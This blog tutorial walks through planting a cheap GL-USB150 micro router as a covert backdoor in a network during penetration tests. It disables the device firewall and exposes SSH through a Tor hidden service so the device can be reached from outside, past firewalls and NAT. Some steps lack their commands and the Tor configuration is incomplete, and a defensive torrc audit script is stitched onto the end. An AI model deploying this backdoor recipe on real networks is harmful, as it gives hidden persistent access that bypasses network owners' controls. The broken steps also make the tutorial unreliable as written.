By Mason Jeffers Taylor
This is a follow-up to the previous article: “Weaponizing a micro router for penetration testing.”
This is how we deploy the GL.INET GL-USB150 in penetration tests to maintain a backdoor into a network.
I’m sure there are many other useful roles this can fill, such as home monitoring. I can’t wait to see what everyone else comes up with.
By making this microrouter accessible via the Tor network, you can reach it remotely, usually even if it is deployed behind a firewall or cable modem.
Open the new dirt cheap GL-USB150 and plug it into your computer.
Wait 60 seconds for it to boot.
Go to http://192.168.8.1
Follow the instructions. Keep in mind that you want to set it to connect to the WiFi access point you will be using in the field. I use my phone’s tethering hotspot or the WiFi in my client’s building.
Let’s set up the ability to log in to this device via SSH without typing a password. To do that, enter these commands on your Linux computer:
scp ~/.ssh/id_rsa.pub firstname.lastname@example.org:/etc/dropbear/authorized_keys
You should be greeted with a new OpenWrt ash shell with this prompt
Allow SSH from anywhere, quick-and-dirty style (feel free to tell me a better way to do this in the comments below):
service firewall disable
service firewall stop
Make sure we’re online.
If you get an error, then you’re not online. If you’re not online, go to http://192.168.8.1 and make it join a WiFi network.
opkg install tor
Next, let’s get the Tor config file set up:
echo "Log notice syslog
HiddenServicePort 22 127.0.0.1:22
User tor" > /etc/tor/torrc
Let’s set up the Tor data directory.
chown -R tor /etc/tor
chmod 700 /etc/tor/other_hidden_service*
chown tor /etc/tor*
service tor enable
service tor start
Check to make sure our .onion hostname is stable:
You should see something like this:
This is your new secret .onion address. Save this for later.
It should be the same. If it’s the same now, we know that it should be the same when deployed. OpenWrt has an issue in which the hostname can change on every reboot, but keeping the files in /etc should fix this.
Now let’s make our Linux desktop able to log in remotely through Tor via SSH. First, install tor and torify with this command:
sudo apt -y install tor
I haven’t figured out why, but it takes our microrouter at least 10 minutes for this service to be reachable through tor.
If it’s been plugged in for a while, give this command a shot:
torify ssh email@example.com
Note: Replace “ad62y2ofdrre3rzq.onion” with your .onion address. To find this, enter this:
Now think of the possibilities of being able to deploy this $22 Linux device (from Amazon) anywhere that it can reach the Internet via WiFi and then being able to reach it, even through firewalls, cable modems and NAT routers. What could you do with this?
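For the defender's side of this setup, here is an added example (not from the original article) that audits a torrc for onion services forwarding to SSH or other local management ports, which is the trace the configuration above leaves on a device. The function name `audit_torrc`, the default port list and the second service block in the sample are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the article: audit a torrc for onion services that
# forward to SSH or other local management ports.

# audit_torrc FILE [PORTS]   (PORTS default is an assumed watch list)
#   Prints "<HiddenServiceDir>|<virtual port>|<target>" per finding.
#   Returns 1 if anything was flagged, 0 otherwise.
audit_torrc() {
    awk -v watch="${2:-22 23 80 443}" '
    BEGIN {
        n = split(watch, w, " ")
        for (i = 1; i <= n; i++) risky[w[i]] = 1
        dir = "(no HiddenServiceDir)"
    }
    { sub(/#.*/, "") }                        # strip comments
    tolower($1) == "hiddenservicedir"  { dir = $2; next }
    tolower($1) == "hiddenserviceport" {
        virt = $2
        target = (NF >= 3) ? $3 : virt        # tor defaults to 127.0.0.1:<virt>
        tport = target
        if (target ~ /:/)               sub(/^.*:/, "", tport)   # addr:port
        else if (target !~ /^[0-9]+$/)  tport = virt             # bare address
        if (tport in risky) { print dir "|" virt "|" target; found = 1 }
    }
    END { exit (found ? 1 : 0) }
    ' "$1"
}

# Constructed sample: the torrc lines shown in this article plus a second,
# hypothetical service block to show per-directory attribution.
sample=$(mktemp)
cat > "$sample" <<'EOF'
Log notice syslog
HiddenServicePort 22 127.0.0.1:22
User tor
HiddenServiceDir /var/lib/tor/web/   # hypothetical path
HiddenServicePort 8080 127.0.0.1:8080
hiddenserviceport 2222 [::1]:22
EOF
audit_torrc "$sample" || echo "review the entries above"
rm -f "$sample"
```

On an OpenWrt device the file to check is /etc/tor/torrc; a finding alongside a disabled firewall service and an unexpected /etc/dropbear/authorized_keys matches the steps in this article.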